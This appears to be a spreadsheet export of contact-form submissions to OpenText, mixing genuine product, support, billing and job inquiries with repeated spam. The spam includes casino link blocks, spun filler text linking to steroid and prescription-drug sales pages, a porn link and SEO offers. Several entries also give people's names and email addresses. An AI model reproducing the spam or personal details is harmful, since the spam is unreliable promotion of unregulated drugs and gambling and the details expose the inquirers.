    <t>mattress stores in minnesota [url=http://topmattressreviews.org/]twin mattress sale 2017 08081[/url] _x000D_
mattresses made in texas [url=http://topmattressreviews.org/]best mattress sale 2018[/url] _x000D_
 _x000D_
mattress toppers best rated &lt;a href="http://topmattressreviews.org/"&gt;mattresses for sale on amazon&lt;/a&gt; _x000D_
twin mattresses on sale clearance near me &lt;a href="http://topmattressreviews.org/"&gt;firm mattress toppers walmart&lt;/a&gt;</t>
  </si>
  <si>
    <t>best online casino _x000D_
[url=http://playcasinoonline24.com/]casino games slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;play casino games online&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t>slots online _x000D_
[url=http://playcasinoonline24.com/]best online casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;kasino&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t>I have seen a job opening in you company in connection with NOC Engineer.I want to know more about this vacancy.</t>
  </si>
  <si>
    <t>I have inherited a legacy product Vignette Tower. All documentation has been mislaid and we need some work done to it. _x000D_
_x000D_
I am looking for some manuals or reference documentation for interfacing with it.</t>
  </si>
  <si>
    <t>Hi there_x000D_
I tried to activate the that I have bought last week but it keeps saying 2We're sorry, your account does not grant you access to this resource". I clicked on the verifying email icon &amp; got my email verified but still not able to activate my key. Please help as my free version is running out soon and I need this software to do my job_x000D_
_x000D_
Many thanks_x000D_
_x000D_
Margaret</t>
  </si>
  <si>
    <t>Please delete my account. I tried to login to change my password and was unable to even complete that simple process. I do not have a need for an account with your service any longer. The email address associated with my account is g.hoeppner@techsmith.com. I can reply to any email confirmation you send to its location. Thank you.</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://playcasinoonline24.com/]online casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games slots&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t>Please provide help for issues about Lic OpenText for Exceed</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.webyhostingbarato.com/wp-content/biller.php?wz=475-Clomiphene-Nz-Side-Effects,Clomid-Singapore-Forum,Testosterone-Phenylpropionate-Recipe]Clomiphene Nz Side Effects[/url]_x000D_
 When you are contemplating private personal bankruptcy, know what introduced anyone to this case. Expenses for unforeseen medical problems are one matter, but paying for no reason is an additional. If you have a tendency to frivolous shelling out, you need to initial get assistance with that or you danger ending up in monetary trouble once again right after your personal bankruptcy._x000D_
  [url=http://www.fitkid.rs/php/lib.php?as=128-Generisk-Cialis-Biverkningar,Kamagra-Oral-Jelly-5gm,Viagra-I-Sverige]Generisk Cialis Biverkningar[/url]_x000D_
 Brush, remember to brush, remember to brush to avoid plaque buildup. Oral plaque is actually a layer of germs that layers your tooth. It is actually transparent. Plaque accumulation triggers cavities. You are able to eliminate oral plaque by cleaning your pearly whites frequently. Ideally, you may remember to brush your teeth after each meal. At a minimum, brush morning and evening._x000D_
  [url=http://www.tutorcostarica.com/includes/throw.php?s=1598-Trenbolone-For-Sale-In-Canada,Mesterolone-Cycle,Primobolan-Powder-Conversion]Trenbolone For Sale In Canada[/url]_x000D_
 In case you are not utilizing your iPhone, set it up to see sleep. The sleeping functionality enables you to help save battery life also it can stop you from the need to fee your telephone as much. You are able to continue to obtain phone calls as well as sms messages, so you will by no means skip one thing important by permitting your telephone to fall asleep._x000D_
  [url=http://www.arnaldodentista.com.br/css/base.asp?m=371-Levitra-Online-Italia-Viagra-Italiano-Naturale-Viagra-Vendita-On-Line-Pfizer]Levitra Online Italia[/url]_x000D_
</t>
  </si>
  <si>
    <t>I haven't been able to download recently purchased Brava Reader, no link or instructions on how to do so. Please rectify asap or refund monies.</t>
  </si>
  <si>
    <t>Inquiry if there is an opening for an IT Internship here in the Philippines.</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://playcasinoonline24.com/]casino online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slot game&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t>Hello, I'm looking to contact the person who oversees your corporate giving program in the Waterloo Office. Can you please provide me with a contact? Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.dmgeventspecialist.com/librarie1s/send.php?put=686-Methenolone-Acetate-Injectable,Testosterone-Cypionate-Sale-Online,Testosterone-Undecanoate-Half-Life]Methenolone Acetate Injectable[/url]_x000D_
 Make your personal seed envelopes to your organic seeds. There is no purpose to get pricey seed envelopes. You could make envelopes by unfolding an industrial a single and making use of it as a stencil to draw in the outline for you of more. Reduce them out, collapse, and stick. That's all there is certainly on it!_x000D_
  [url=http://www.hificollection.com/img/component.php?save=263]Buy Stanozolol Nz[/url]_x000D_
 Should you be within a specific revenue limit, you almost certainly be eligible for a discount plan. These ideas are often made available from the state you reside in and will range between a single express to the other. Consider what your express has to offer, and make certain your income is very low adequate to meet the criteria._x000D_
  [url=http://msrisuty.cz/language/assets.php?start=1547-Trenbolone-Acetate-Half-Life,Oxandrolone-Uk,Testosterone-Isocaproate-Uses]Trenbolone Acetate Half Life[/url]_x000D_
 When considering plastic surgery, steer clear of going to your physician and inquiring him to make the body seem "the same as" somebody else's While it is a pleasant strategy to have an picture of what you would like in mind, it really is by no means a great idea to possess a particular snapshot under consideration. Everyone differs, and your result might not exactly seem like a person else's Keeping a wide open thoughts will help stop disappointment._x000D_
  [url=http://www.sherloc.com.ec/cache/rain.php?what=Testosterone-Cypionate-Injection-Sites-Nandrolone-Cypionate-Testosterone-Booster-China-1250/]Testosterone Cypionate Injection Sites[/url]_x000D_
</t>
  </si>
  <si>
    <t>Looking for a solid solution to meet the following high level needs as well as basic ECM functionality:_x000D_
1. Model/template based asset variant creation and management with inheritance from the model down to the variants._x000D_
2. Auto asset kit creation based on date and variant selection.  _x000D_
3. Version management and replaces / replaced by traceability with draft, active, retired, and archived date/time._x000D_
4. New model year AEP change-over: Ability to create placeholders for the new year and define new, modified, carry-over, retired for each asset.  Ability to create and approve these assets based on new year change requirement and new asset workflow._x000D_
5. View management for organizational area, roles, and external organizations.  An external organization should only see their documents and workflows in which they are involved._x000D_
6. Where-used functionality.  A single asset can be used on multiple portals, pages within pages, and URLs.  This should be inherited down, but can be edited on versions/revisions. They can also be printed individually or in a kit.  If printed, they must contain print vendor and print specifications.  We need to track this information by asset variant._x000D_
7. Document creation workflow.  Example: Draft, Business Review, Compliane Review, external business review, external compliance review, cms review.  Additional workflows may be started from the point of acceptance/approval. _x000D_
8. Asset ingestion via api with workflow._x000D_
9. Asset fulfillment (printing) workflow._x000D_
10. Asset placement on website portals / pages workflow._x000D_
11. Ability to define variants down to print variant (with in-design cover and Word insert) and portal variant (cover and insert combined in one pdf)_x000D_
13. Ability to send request for translation and store multiple language variants of an asset variant.  Also ability to pull right translated variants for kits.  _x000D_
14. Ability to create an asset dashboard that displays the requested variants and versions for a specific model year / date</t>
  </si>
  <si>
    <t>cbd gummies for sale 10 lbs [url=https://cbdoilproducts.org/]hemp cbd oil benefits research[/url] _x000D_
benefits of cbd oil for skin [url=https://cbdoilproducts.org/]innovet cbd oil for dog anxiety reviews[/url] _x000D_
 _x000D_
hemp cbd oil benefits for dogs &lt;a href="https://cbdoilproducts.org/"&gt;cbd oil for pain relief in dogs&lt;/a&gt; _x000D_
cbd oil for pain relief in dogs &lt;a href="https://cbdoilproducts.org/"&gt;recipes for using cbd oil for pain control&lt;/a&gt;</t>
  </si>
  <si>
    <t>I uploaded the wrong version of my cover letter, a raw draft in word. I have an updated, clean PDF cover letter to replace the previous letter, for my application. How can I do that?</t>
  </si>
  <si>
    <t xml:space="preserve">I was wondering if you could talk to me or guide me in the right direction in discussing your reporting and output management suite. We are facing some reporting challenges here at MB and would love to get you on the phone to discuss some possible solutions. What would be a good time to talk? </t>
  </si>
  <si>
    <t>I have a client who has and EMR, Intergy by Greenway, and they are needing a fax solution to replace the Castille hardware they started out with. From what I am reading it looks like this is a very viable solution to meet their needs. My Greenway technical support has indicated that RightFax has been used with the Intergy/EHR product. I need to talk to someone who has experience in integrating you solution with an existing EMR._x000D_
I will be available on Monday Mar 30th for that week to speak to someone and get my questions answered.</t>
  </si>
  <si>
    <t>Interested in evaluating ontent Server 16.4</t>
  </si>
  <si>
    <t>Cloud faxing</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My name is Joe Ennis. I work for Insightin Digital located in Gaithersburg, MD up the road from you all. I noticed that Opentext has an excellent blog and I wanted to see if I could help take it a step forward by helping Opentext start a podcast. I noticed that mark interviews many different people and gives a lot of lectures, and I think that you could easily turn those into audio episodes and blog posts for your site. Feel free to email or call me if you would like more information._x000D_
Thanks!_x000D_
Joe _x000D_
</t>
  </si>
  <si>
    <t>The City of Boston will be advertising an RFP for data analytics and electronic record retention software. I discovered your Auto-Classification offering while searching for potential solutions. If you provide an email address for a point of contact, we will let you know when our RFP is published should you be interested in this opportunity._x000D_
_x000D_
Thanks,_x000D_
Chris</t>
  </si>
  <si>
    <t>I am trying to purchase the $59 option for the TX version. For some reason it wont go through. We just recently used the business card so we know it isn't that. Is there something wrong with paypal? Do I need a paypal account? _x000D_
I appreciate any help._x000D_
- Alyssa</t>
  </si>
  <si>
    <t>Hi ,_x000D_
    I am unable to connect OpenText connect. I want to visit pages related to OTPS entity modeling and process experience. It seems I don't have permission for those. Can you please provide the access to OpenText connect ?</t>
  </si>
  <si>
    <t>We're looking into using xPression to produce documentation from our Policy and Claims administration system. We'd like to have the Development environment ready within the next 2 to 3 weeks. Please contact me so that we can discuss costs and pre-requirements (servers, target setup, etc...)</t>
  </si>
  <si>
    <t>slots online _x000D_
[url=http://playcasinoonline24.com/]play casino games online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>I would like to receive pricing information for eDOCS DMS along with the OpenText Email Filing eDOCS Edition module for one user only.  Also, can it be installed on a desktop and not the enterprise server?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I would like to know more about OpenText VIM 7.5 certification. Is it possible to only attend the certification exam? What will be the fees for the certification exam._x000D_
_x000D_
Currently, I am working as a VIM Consultant and having experience in implementation, roll out etc._x000D_
_x000D_
Thanks._x000D_
_x000D_
Marmik Shah</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.suneelduttgoyal.com/wp-admin/list.php?a=332-Viagra-200mg-Erfahrungen,Cialis-Kaufen-Forum,Cialis-Preise-Apotheke-Ã–sterreich]Viagra 200mg Erfahrungen[/url]_x000D_
 You should ensure you have an proper compensate program in place for this kind of hard task. You will need to treat yourself for a minimum of the initial 72 hours of stopping along with the first couple of weeks. Following that, monthly milestones are well worth a celebration till you struck the yearly symbol. You may choose your compensate based on the time elapsed also, creating accomplishment so much nicer._x000D_
  [url=http://chembiol.chem.uoi.gr/filter/simple.php?u=1063-Stanozolol-Ireland-Methenolone-Oral-Tadalafil-Supplier.html]Stanozolol Ireland[/url]_x000D_
 Continue to keep each of the equipment you employ in juicing, like your slicing board, knives, gauging mugs, juice extractor, and so forth. with each other in their own individual place which means you always know exactly where they can be. Usually the one explanation you won't carry on juicing is mainly because you're not retaining your things prepared, allowing you sensing frustrated and stressed._x000D_
  [url=https://asistel.com.co/prueba/search.php?b=649-Methandienone-Usa,Anavar-Oxandrolone-For-Sale-Uk,Methandienone-Price-In-Usa]Methandienone Usa[/url]_x000D_
 Regardless of whether you only acquired a pink slide or you've been task trying to find a few months, you may well be given on top of the process. Don't lose heart there's some thing you can do about this. Read on to discover the best strategies to technique your career search to help you locate a work simply and efficiently._x000D_
  [url=http://www.abda.com.pl/css/list.php?s=212-ansomone-hgh-fake-jintropin-aq-price-jintropin-us-reviews/]ansomone hgh fake[/url]_x000D_
</t>
  </si>
  <si>
    <t>I am very dissatisfied with the responsiveness of the OpenText Learning Organization.  Several emails, registrations and voicemails have gone unanswered.  I would welcome contact from OpenText to discuss this customer service failure. -  Regards, Steve Frazer</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://playcasinoonline24.com/]cassino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;best online casino&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>Trying to login to Open Text Gupta Training University. An email sent to me says I can try it out before a required subscription is needed. However, when I login, I get "Enter Activation Key" and without it I cannot login. Please advise.</t>
  </si>
  <si>
    <t xml:space="preserve">EDR documentation </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I am trying to purchase 10 network license but when clicking proceed an error appears before I am able to login to PayPal._x000D_
Thanks, _x000D_
Andrew_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Does EasyLink Fax2Mail supports SAML SSO?_x000D_
Does it support OAuth &amp; OpenID?_x000D_
Is there a free-trial account available, &amp; if not can we know the pricing details?_x000D_
</t>
  </si>
  <si>
    <t>Opt-In</t>
  </si>
  <si>
    <t>Need to contact for OCR/ICR/IDR extractor.</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://playcasinoonline24.com/]casinos online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;best online casino&lt;/a&gt; _x000D_
kasino</t>
  </si>
  <si>
    <t>We are looking for an automation solutions to process documents that are sent in as an image, and I understand that opentext does offer solutions that might fulfill our requirement - Email2EDI/ Fax2EDI solutions?_x000D_
Please kindly contact me as we would like to invite you into our office to learn more about these solutions, thank you!</t>
  </si>
  <si>
    <t>We are now using SQLBase V11. We want to have info about upgrading to the latest version and look into Integration Center for Synchronisation/replication. Could you contact us?</t>
  </si>
  <si>
    <t>info about Documentum licensing price</t>
  </si>
  <si>
    <t>&lt;a href=https://de.justporno.sex&gt;web sites about porn&lt;/a&gt;</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are currently in the process of researching into a suitable solution for archiving capability. We are looking for a divisional solution to archive files, emails and private data across all sites. We would like to get you in to demo - please can you provide me with a suitable contact number._x000D_
_x000D_
Many Thanks_x000D_
Lily Cockerill</t>
  </si>
  <si>
    <t>I am looking into electronic faxes as an option at my company. I can see this is a service that you offer, but don't see any prices on your site. Can you advise how I can obtain a quote/ what information is needed to provide a quote?</t>
  </si>
  <si>
    <t>cassino _x000D_
[url=http://playcasinoonline24.com/]cassino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casinos online&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
hiermit möchte ich die Bereitstellung einer Testversion ihrer Cloud-Fax-Lösung anfragen, sofern so etwas ihrerseits möglich ist._x000D_
_x000D_
Vielen Dank._x000D_
Mit freundlichen Grüßen,_x000D_
Erik Neumann_x000D_
</t>
  </si>
  <si>
    <t>To whom It may concern,_x000D_
_x000D_
_x000D_
    As part of our preparation for the new GDPR legislation, I am contacting all our suppliers of online services, who have control our data to request a copy of their data sharing agreements. Please can you supply us with this so we can update our records._x000D_
_x000D_
If you are not responsible for providing us with this information, please could you pass the email on to the relevant person._x000D_
_x000D_
_x000D_
Many thanks</t>
  </si>
  <si>
    <t>To fuck</t>
  </si>
  <si>
    <t>Not able to access mysupport portail after register in your portal.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, ich werde von Ihnen genötigt, damit ich weiterhin Informationen per Mail von Ihnen erhalte, neue Geschäftsbedingungen in Englisch abzunicken. Gibt es diese Bedingungen auch in Deutsch?_x000D_
Mit freundlichen Grüsse_x000D_
Peter Kalt</t>
  </si>
  <si>
    <t>checking to see if Medibank has any active Learning On Demand Subscriptions.</t>
  </si>
  <si>
    <t>Hello! I am Jerry Anthony P. Dupo. I am soon graduating from the University of Santo Tomas. I am trying to gain my Bachelor's Degree in Computer Science specializing in Data Science. I am also seeking for career opportunities for newly graduates. I recently applied to your company in one of the career fairs at my university. My bock mates said they have been contacted by OpenText for employment purposes already. Unfortunately, not the same can be said from me. Is there any way I can be scheduled for an interview or a test for employment? Thank you.</t>
  </si>
  <si>
    <t>To the Head of the Marketing/Strategy Team,_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
We have published a report on Global Enterprise File Synchronization and Sharing (EFSS) Market Size and Analysis - _x000D_
_x000D_
Forecasts to 2025._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Best Regards!</t>
  </si>
  <si>
    <t>Hi, _x000D_
We have a bank client in Hanoi, Vietnam is looking for an ECM solution. I would like to ask if you are interested in this opportunity and can you arrange for a presentation and demo of OpenText ECM Suite functions and support capabilities to Vietnam market in a couple of weeks._x000D_
Thanks and Best Regards, _x000D_
Huong Nguyen</t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://playcasinoonline24.com/]online gambling casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino slots&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t>We were instructed by Bruker to purchase OpenText NFS Client &amp; NFS Solo – Access to File and Printer Resources. We were wondering is there any academic discount for U of T. _x000D_
Thanks</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://playcasinoonline24.com/]casino games[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino slots&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t xml:space="preserve">Accenture would like to add OpenText active certifications to our internal global certification tracking and report utility called myCertification.  As such, we are looking to understand what OpenText certification reporting options are available. </t>
  </si>
  <si>
    <t xml:space="preserve">We are using OpenText Right fax integration with Konica copiers. We have fax confirmations set up to go automatically to the senders' email. These fax confirmation pages are critical to business operations, and we are required to have an image of page one on the fax confirmation sheet. Is there a way to include the 1st page of the fax as a thumbnail on the confirmation sheet that gets emailed to the sender?    </t>
  </si>
  <si>
    <t>Hi OpenText team,_x000D_
_x000D_
This is in regards to the issue I am facing while trying to login in the opentext website._x000D_
I am not able to login, and when I am trying to recover my password by clicking on 'Forgot my password', I do not get any mail to reset the same._x000D_
_x000D_
I would appreciate it if you can look into this issue._x000D_
_x000D_
Best Regards_x000D_
Akarsh Aman</t>
  </si>
  <si>
    <t>We are exploring the CCM solutions in the marketplace to find a better alternative to our existing  Kofax CCM (ITP) platform. Would like to hear from you....</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for Java j2ee Sr consultant job_x000D_
</t>
  </si>
  <si>
    <t>Thank You</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://playcasinoonline24.com/]best online casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t>Green Sponsorship Opportunity at True North!_x000D_
_x000D_
You may or may not have heard of the True North event powered by Communitech that is being hosted in Kitchener from May 29-31._x000D_
 _x000D_
Livescape is seeking collaborative sponsorship to create a living wall installation at True North, as a visual representation of new clean technology innovation that we have been developing at the Accelerator Centre. True North is offering Living Wall Installation sponsors the same perks as other True North Sponsors, at discounted rates. In order for sponsors to be included in True North media and on the sponsor wall, we need to confirm sponsorships by May 4th. _x000D_
 _x000D_
This would be an amazing opportunity to support a local start up and the environment!_x000D_
_x000D_
About Livescape: Livescape is a female-founded botanical design and installation company specializing in living wall and green roof solutions for corporate, commercial, institutional, and custom projects. The company is progressing through the Accelerator Centre's clean technology program to further the development of innovative living wall solutions to enhance office environments across North America. _x000D_
_x000D_
If you have an interest in becoming a collaborative sponsor for the Living Wall Innovation Display at True North, please don't hesitate to reach out. _x000D_
_x000D_
Warmest regards, _x000D_
Tessa Jennison</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I´m from SoftwareONE and I have an end customer in Panamá and he is interested on one of your licenses, "Exceed" and we want to know about this:_x000D_
if we can sell this product?_x000D_
how it is licensed? and if it is per user, per computer or other?_x000D_
Thank you!_x000D_
Waiting for your prompt response on this matter </t>
  </si>
  <si>
    <t>I am looking for a way to send out communications to the residents at the condominium complex.</t>
  </si>
  <si>
    <t xml:space="preserve">We need a copy of billing document number 9000315696 for customer ID 10417407. We also need a copy of your W9 so we can process the invoice for payment. </t>
  </si>
  <si>
    <t>I need a copy of invoice 9000410924 - can this email please be copied on all invoices emailed for account 0010074003?_x000D_
Accounts Payable department is not receiving the invoices in a timely manner from other departments..    thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please retrieve all of my deleted e-mails from January 2010 to the current time period from my studies done as a student, in the Education Department at Concordia University? It is apparent that someone, other than me, changed my settings to delete my concordia e-mails on my private account. My e-mail address is b_maxwe@education.concordia.ca  _x000D_
If there are any questions, or to confirm receipt of this e-mail, then please e-mail me at maxwellb@selwyn.ca _x000D_
_x000D_
The Education Department at Concordia University is no longer using the FirstClass system so it is important to retrieve these e-mails for me. They all can be sent to me at the following e-mail address: maxwellb@selwyn.ca _x000D_
Thank you for your assistance on this urgent matter, and I am looking forward to your correspondence soon. _x000D_
Bruce Maxwell_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I need my EAN/ANA  and TUN Numbers and please confirm that I'm using Tradacoms V9_x000D_
please advise me as early as possible on Friday 27/4/18</t>
  </si>
  <si>
    <t>Inquiry about support</t>
  </si>
  <si>
    <t>Request for RightFax training and paths to certification</t>
  </si>
  <si>
    <t>I work for DXC Technology and we are considering various CCM products to support our Life insurance clients.  We would like to see a demo of your CCM software Xpressions and its capabilities (If possible also compare it with you another offering Exstream).  We will be interested to know how to use it in an implementation and production support setting. _x000D_
At this point we are looking forward to a conceptional demo which explains end to end CCM cycle support by your S/W. The attendees on DXC side would be mix of Technical Architects and Sales Leaders looking for how we can use the product._x000D_
•	Overview of end-to-end architecture (system requirements, database formats, etc)_x000D_
•	Supported Input data formats_x000D_
•	Font library (what is standard and how are new fonts added)_x000D_
•	Mailing solutions (sorting, OMR marks, bar coding, etc)_x000D_
•	Print output formats (PCL, Xerox, AFP, PDF, etc)_x000D_
•	Archive and retrieval solutions_x000D_
•	Product growth/Release strategy. Is it one of your focused product slated for upgrades in future or any new/other CCM tool will in focus at OpenText._x000D_
DXC audience is scattered across US states so a web meeting demo would be ideal. It would be great if we could schedule an hour anytime next week. Let me know if you have any questions for creating the demo.  If you have any overview materials I can distribute to DXC team prior to the meeting so we'll be more prepared for the meeting._x000D_
_x000D_
Best Regards.</t>
  </si>
  <si>
    <t>online casino gambling _x000D_
[url=http://playcasinoonline24.com/]best online casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino online&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>Our people's home sustention services are a great settling with a objective all of your accepted get needs. _x000D_
[url=http://sdpro-handyman.com/]Handyman Services[/url] is the best secondment provider in and in every leadership San Diego. _x000D_
 _x000D_
[url=http://sdpro-handyman.com/alpine-handyman/]Alpine Handyman Services[/url] _x000D_
[url=http://sdpro-handyman.com/bonita-handyman/]Bonita Handyman Services[/url] _x000D_
[url=http://sdpro-handyman.com/cardiff-handyman/]Cardiff Handyman Services[/url] _x000D_
[url=http://sdpro-handyman.com/carlsbad-handyman/]Carlsbad Handyman Services[/url] _x000D_
[url=http://sdpro-handyman.com/chula-vista-handyman/]Chula Vista Handyman Services[/url] _x000D_
[url=http://sdpro-handyman.com/coronado-handyman/]Coronado Handyman Services[/url] _x000D_
[url=http://sdpro-handyman.com/del-mar-handyman/]Del Mar Handyman Services[/url] _x000D_
[url=http://sdpro-handyman.com/el-cajon-handyman/]El Cajon Handyman Services[/url] _x000D_
[url=http://sdpro-handyman.com/encinitas-handyman/]Escondido Handyman Services[/url] _x000D_
[url=http://sdpro-handyman.com/imperial-beach-handyman/]Imperial Beach Handyman Services[/url] _x000D_
 _x000D_
We on 24 / 7. You may diary [b]San Diego Pro Handyman[/b] assignment online or past and above the phone. _x000D_
Handyman Services is locally owned and operated but backed on public stigmatize standards. We vigorous and  in your area.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I just came across your website and was wondering if you accept guest posts/sponsored posts.We only want to send over relevant and high quality content written by our team of editors._x000D_
We are open to paying for the post._x000D_
_x000D_
Feel free to email me at localninja.io@gmail.com or call me at (732)3213626._x000D_
_x000D_
thanks and let me know what you think,_x000D_
_x000D_
Alaster Biao,_x000D_
Outreach Manager_x000D_
SEOly_x000D_
</t>
  </si>
  <si>
    <t>Demo For End Client</t>
  </si>
  <si>
    <t>INFO-MAGELLAN-Hand helled (Tsrito9n)GPS</t>
  </si>
  <si>
    <t xml:space="preserve">Need access to understanding content server, content web services artifacts._x000D_
For learning purpose. </t>
  </si>
  <si>
    <t>1000000+ unique high-ranking visitors from the US, AU, CA, UK per month to your site _x000D_
Hello. _x000D_
If you need to have so much quality traffic without only a few body movements, you can find the funniness here: http://make[dot]ultimate-link-building[dot]info/ _x000D_
([dot] replaced by .)</t>
  </si>
  <si>
    <t xml:space="preserve">A quote for 5 provision floating licenses. </t>
  </si>
  <si>
    <t>Mit Exceed V15 werden wichtige Sonderzeichen wie ~ oder | (ALT GR + xxx) in den meisten Fällen unter Citrix verstümmelt. gibt es hierfür ein Patcht etc.</t>
  </si>
  <si>
    <t>Can I use this from a Mac? I can not find any information on how to download or subscribe. Thank you.</t>
  </si>
  <si>
    <t>Compatibility.  Will Qfiniti Opentext 10.6 support the high resolution display on a surface pro 4 for capture.  resolution is  2736x1824 at 267 PPI</t>
  </si>
  <si>
    <t>slot online _x000D_
[url=http://playcasinoonline24.com/]online casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;play casino games online&lt;/a&gt; _x000D_
best online casino</t>
  </si>
  <si>
    <t>Sorry i missed it too - When is the next UK based Innovation meet up?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.bateriasexpress.com.br/css/back.asp?xaaa=82-Cialis-Italia-Senza-Ricetta-Comprare-Levitra-Originale-Online-Viagra-Donne-Yahoo]Cialis Italia Senza Ricetta[/url]_x000D_
 Business cards are a fantastic way to market your home based business and acquire your company name in the market to the community. Seek out totally free business cards online and then spread them anywhere you go, which includes supermarkets, dentist office buildings plus your children's universities._x000D_
  [url=http://www.iconepress.com.br/img/error.php?job=1380]Testosterone Powder Legal[/url]_x000D_
 Do not let your seasonal allergies stop you from the delights and health advantages of any good operate outside. A good time to engage in basic activities outside is right after a rainshower. Bad weather tames clouds of pollens, spores and mold and causes you to not as likely to experience high allergen amounts._x000D_
  [url=http://www.activecraft.com/img/away.php?get=Trenbolone-Powder-Price-Clomiphene-Citrate-Australia-Methandienone-Wholesale-1622/]Trenbolone Powder Price[/url]_x000D_
 Save yourself dollars and grief just before entering the money marketplace by attempting a risk cost-free exercise account for a while. The Forex market must be treated with extreme caution and respect equally as every other substantial daily life experience. Remain calm and make use of good sense exercise and teach your self first._x000D_
  [url=http://www.atlantiquegites.com/includes/old.php?hot=Testosterone-Shots-Side-Effects-Oxymetholone-Powder-For-Sale-Testosterone-Powder-Source-1436/]Testosterone Shots Side Effects[/url]_x000D_
</t>
  </si>
  <si>
    <t>Client Currently a local edocs 5.3.1, its old and out dated. Was wondering who i can speak with to get a quote to move our database in the cloud, and how much it will cost for the initial set up and reoccurring costs._x000D_
_x000D_
Thanks for your time.</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://playcasinoonline24.com/]slot game[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>Am interested in learning about active archiving of our MSSQL db's that support our applications.</t>
  </si>
  <si>
    <t>We need xcp developer class training in USA Opentext offices for 3 trainees</t>
  </si>
  <si>
    <t xml:space="preserve">I have open source Eclipse BIRT, but am interested in the Designer Professional Plugin to obtain some of the features not available in Eclipse BIRT.  Can someone please contact me regarding the pricing? </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
are parent company is in contact with your team as far as contracts go (loanDepot) however I need the virtual fax download in msi to deploy it, not in exe format. is this possible to email to me?_x000D_
</t>
  </si>
  <si>
    <t>Marcos Limoli { Porte-feuiller}*_x000D_
REPÚBLICA FEDERATIVA DO BRASIL._x000D_
_x000D_
*Em busca, de trabalho de grande envergadura, risco e responsabilidade;  (países em conflito) de lingua lusitano.</t>
  </si>
  <si>
    <t>Ilustre Cavalheiro._x000D_
Howard Sklar._x000D_
Marcos Limoli { Linkedin }_x000D_
Orador &amp; Formador de Opinião._x000D_
REPÚBLICA FEDERATIVA DO BRASIL.</t>
  </si>
  <si>
    <t>Bom dia,_x000D_
_x000D_
Estou em negociação com o Carrefour e eles solicitaram um provedor EDI._x000D_
_x000D_
Por favor, me envie uma proposta para analise</t>
  </si>
  <si>
    <t xml:space="preserve">Cialis Rezeptfrei Test Propecia Calendario Comprar Cialis En La Farmacia Sin Receta  [url=http://cialviag.com]cialis prices[/url] Cephalexin Dosing Instructions Buy Amoxicillin No Prescription Canada Where To Purchase Chat Lagyl  </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, my credentials have bruno.hoeller@extern.computacenter.com as Name/Mailadress. I wanted to get your news to another mail adress. Therefore I changed this in the data at the place where it is offered to change mail adress to bruno.hoeller@h2-solutions.de . this might have created some confusion to the system. Now I cannot login neither with the first nor the new mailadress. Could you please help me? It would be ok. if we go back to the first mailadress. Thanks in advance. Bruno Hoeller. </t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://playcasinoonline24.com/]kasino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;cassino&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t xml:space="preserve">Kör streamserve ver 4.1.2 sp1 försöker använda odbc_x000D_
När jag anger -odbc i argumentfilen fär jag felmeddelande_x000D_
